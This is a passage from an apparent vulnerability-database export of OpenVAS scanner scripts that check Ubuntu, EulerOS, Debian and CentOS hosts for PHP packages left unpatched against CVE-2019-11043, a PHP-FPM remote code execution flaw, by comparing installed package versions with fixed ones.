You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844212\");\n script_version(\"2019-12-12T11:35:23+0000\");\n script_cve_id(\"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-12-12 11:35:23 +0000 (Thu, 12 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-29 03:00:53 +0000 (Tue, 29 Oct 2019)\");\n script_name(\"Ubuntu Update for php7.3 USN-4166-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU19\\.10|UBUNTU19\\.04|UBUNTU16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"4166-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-October/005166.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php7.3'\n package(s) announced via the USN-4166-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that PHP incorrectly handled certain paths when being\nused in FastCGI configurations. A remote attacker could possibly use this\nissue to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"'php7.3' package(s) on Ubuntu 19.10, Ubuntu 19.04, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php7.2\", ver:\"7.2.24-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"php7.2-cgi\", ver:\"7.2.24-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"php7.2-cli\", ver:\"7.2.24-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"php7.2-fpm\", ver:\"7.2.24-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU19.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php7.3\", ver:\"7.3.11-0ubuntu0.19.10.1\", rls:\"UBUNTU19.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"php7.3-cgi\", ver:\"7.3.11-0ubuntu0.19.10.1\", rls:\"UBUNTU19.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"php7.3-cli\", ver:\"7.3.11-0ubuntu0.19.10.1\", rls:\"UBUNTU19.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"php7.3-fpm\", ver:\"7.3.11-0ubuntu0.19.10.1\", rls:\"UBUNTU19.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU19.04\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php7.2\", ver:\"7.2.24-0ubuntu0.19.04.1\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"php7.2-cgi\", ver:\"7.2.24-0ubuntu0.19.04.1\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"php7.2-cli\", ver:\"7.2.24-0ubuntu0.19.04.1\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"php7.2-fpm\", ver:\"7.2.24-0ubuntu0.19.04.1\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php7.0\", ver:\"7.0.33-0ubuntu0.16.04.7\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"php7.0-cgi\", ver:\"7.0.33-0ubuntu0.16.04.7\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"php7.0-cli\", ver:\"7.0.33-0ubuntu0.16.04.7\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"php7.0-fpm\", ver:\"7.0.33-0ubuntu0.16.04.7\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:35:01", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-2295)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192295", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192295", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2295\");\n script_version(\"2020-01-23T12:45:46+0000\");\n script_cve_id(\"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:45:46 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:45:46 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-2295)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP8\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2295\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2295\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'php' package(s) announced via the EulerOS-SA-2019-2295 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.(CVE-2019-11043)\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on Huawei EulerOS V2.0SP8.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP8\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~7.2.10~1.h7.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~7.2.10~1.h7.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~7.2.10~1.h7.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-fpm\", rpm:\"php-fpm~7.2.10~1.h7.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~7.2.10~1.h7.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~7.2.10~1.h7.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~7.2.10~1.h7.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~7.2.10~1.h7.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~7.2.10~1.h7.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~7.2.10~1.h7.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~7.2.10~1.h7.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~7.2.10~1.h7.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~7.2.10~1.h7.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T19:29:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-10-27T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for php5 (DLA-1970-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891970", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891970", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891970\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-10-27 03:00:07 +0000 (Sun, 27 Oct 2019)\");\n script_name(\"Debian LTS: Security Advisory for php5 (DLA-1970-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/10/msg00033.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1970-1\");\n script_xref(name:\"URL\", value:\"https://github.com/neex/phuip-fpizdam\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php5'\n package(s) announced via the DLA-1970-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Emil Lerner, beched and d90pwn found a buffer underflow in php5-fpm, a\nFast Process Manager for the PHP language, which can lead to remote\ncode execution.\n\nInstances are vulnerable depending on the web server configuration, in\nparticular PATH_INFO handling. For a full list of preconditions,\ncheck the referenced advisory.\");\n\n script_tag(name:\"affected\", value:\"'php5' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this problem has been fixed in version\n5.6.40+dfsg-0+deb8u7.\n\nWe recommend that you upgrade your php5 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-phpdbg\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-readline\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.6.40+dfsg-0+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-06T12:19:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-11-02T00:00:00", "type": "openvas", "title": "CentOS Update for php CESA-2019:3287 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2019-11-04T00:00:00", "id": "OPENVAS:1361412562310883128", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310883128", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.883128\");\n script_version(\"2019-11-04T08:05:52+0000\");\n script_cve_id(\"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-04 08:05:52 +0000 (Mon, 04 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-02 03:00:45 +0000 (Sat, 02 Nov 2019)\");\n script_name(\"CentOS Update for php CESA-2019:3287 centos6 \");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n\n script_xref(name:\"CESA\", value:\"2019:3287\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2019-November/023506.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the CESA-2019:3287 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nSecurity Fix(es):\n\n * php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on CentOS 6.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"CentOS6\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-embedded\", rpm:\"php-embedded~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-enchant\", rpm:\"php-enchant~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-fpm\", rpm:\"php-fpm~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-intl\", rpm:\"php-intl~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-zts\", rpm:\"php-zts~5.3.3~50.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:30:13", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-01-09T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for php7 (openSUSE-SU-2019:2441-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2020-01-31T00:00:00", "id": 